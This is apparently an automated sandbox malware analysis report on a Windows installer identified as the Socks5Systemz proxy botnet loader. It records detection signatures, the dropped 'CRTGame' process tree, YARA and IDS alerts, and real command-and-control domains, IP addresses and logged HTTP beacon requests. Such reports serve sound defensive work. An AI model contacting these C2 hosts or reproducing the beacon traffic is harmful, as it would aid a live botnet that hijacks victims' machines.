Edit tour

Windows Analysis Report
Mg5bMQ2lWi.exe

Overview

General Information

Sample name:	Mg5bMQ2lWi.exe renamed because original name is a hash value
Original sample name:	7700eba1ceaa134b1da16d1ede0e7894.exe
Analysis ID:	1575254
MD5:	7700eba1ceaa134b1da16d1ede0e7894
SHA1:	d591222916193a3bcaef009eae37fc60acbff924
SHA256:	87324fceb64682470429276f1766671ad250163a2404b7b7df6f4d25007a1df0
Tags:	exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Petite Virus

Yara detected Socks5Systemz

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to infect the boot sector

PE file has nameless sections

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Mg5bMQ2lWi.exe (PID: 4504 cmdline: "C:\Users\user\Desktop\Mg5bMQ2lWi.exe" MD5: 7700EBA1CEAA134B1DA16D1EDE0E7894)

Mg5bMQ2lWi.tmp (PID: 2200 cmdline: "C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)

schtasks.exe (PID: 2108 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

crtgame.exe (PID: 6008 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: A158C99AA92F0E29ED84BB25976D4F7A)

net.exe (PID: 6688 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net1.exe (PID: 6996 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

crtgame.exe (PID: 5824 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: A158C99AA92F0E29ED84BB25976D4F7A)

cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["gdpkvkr.com"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000006.00000002.2944967183.0000000002A31000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: crtgame.exe PID: 5824	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:53:05.470412+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49736	94.232.249.187	80	TCP
2024-12-15T00:53:18.604536+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49764	94.232.249.187	80	TCP
2024-12-15T00:53:31.870192+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49790	94.232.249.187	80	TCP
2024-12-15T00:53:50.705539+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:54.522921+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:56.045459+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49860	185.237.206.129	80	TCP
2024-12-15T00:53:57.696443+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49866	185.237.206.129	80	TCP
2024-12-15T00:53:59.329963+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49872	185.237.206.129	80	TCP
2024-12-15T00:54:00.858930+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49875	185.237.206.129	80	TCP
2024-12-15T00:54:02.418389+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49880	185.237.206.129	80	TCP
2024-12-15T00:54:04.014737+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49885	185.237.206.129	80	TCP
2024-12-15T00:54:05.707108+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49889	185.237.206.129	80	TCP
2024-12-15T00:54:07.245777+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49894	185.237.206.129	80	TCP

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:53:05.470412+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49736	94.232.249.187	80	TCP
2024-12-15T00:53:18.604536+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49764	94.232.249.187	80	TCP
2024-12-15T00:53:31.870192+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49790	94.232.249.187	80	TCP
2024-12-15T00:53:50.705539+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:54.522921+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49847	185.237.206.129	80	TCP
2024-12-15T00:53:56.045459+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49860	185.237.206.129	80	TCP
2024-12-15T00:53:57.696443+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49866	185.237.206.129	80	TCP
2024-12-15T00:53:59.329963+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49872	185.237.206.129	80	TCP
2024-12-15T00:54:00.858930+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49875	185.237.206.129	80	TCP
2024-12-15T00:54:02.418389+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49880	185.237.206.129	80	TCP
2024-12-15T00:54:04.014737+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49885	185.237.206.129	80	TCP
2024-12-15T00:54:05.707108+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49889	185.237.206.129	80	TCP
2024-12-15T00:54:07.245777+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49894	185.237.206.129	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mg5bMQ2lWi.exe

Avira: detected

Found malware configuration

Source: crtgame.exe.5824.6.memstrmin

Malware Configuration Extractor: Socks5Systemz {"C2 list": ["gdpkvkr.com"]}

Multi AV Scanner detection for submitted file

Source: Mg5bMQ2lWi.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,	1_2_0045C8A8
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045C95C ArcFourCrypt,	1_2_0045C95C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045C974 ArcFourCrypt,	1_2_0045C974
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_10001000 ISCryptGetVersion,	1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_10001130 ArcFourCrypt,	1_2_10001130

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Unpacked PE file: 4.2.crtgame.exe.400000.0.unpack

Source: Mg5bMQ2lWi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:	Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-OGODD.tmp.1.dr
Source:	Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-1CHIA.tmp.1.dr

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004520C0 FindFirstFileA,GetLastError,	1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,	1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,	1_2_00461E78

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49736 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49736 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49790 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49790 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49847 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49847 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49860 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49860 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49875 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49872 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49872 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49875 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49894 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49894 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49889 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49889 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49866 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49866 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49764 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49880 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49880 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49764 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49885 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49885 -> 185.237.206.129:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: gdpkvkr.com

Source: global traffic

TCP traffic: 192.168.2.4:49851 -> 89.105.201.183:2023

Source: Joe Sandbox View	IP Address: 89.105.201.183 89.105.201.183
Source: Joe Sandbox View	IP Address: 94.232.249.187 94.232.249.187

Source: Joe Sandbox View	ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
Source: Joe Sandbox View	ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	TCP traffic detected without corresponding DNS query: 89.105.201.183
Source: unknown	UDP traffic detected without corresponding DNS query: 141.98.234.31
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown	UDP traffic detected without corresponding DNS query: 152.89.198.214

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Code function: 6_2_02C22B95 WSASetLastError,WSARecv,WSASetLastError,select,

6_2_02C22B95

Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: bodotpd.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1Host: gdpkvkr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: global traffic	DNS traffic detected: DNS query: bodotpd.com
Source: global traffic	DNS traffic detected: DNS query: gdpkvkr.com

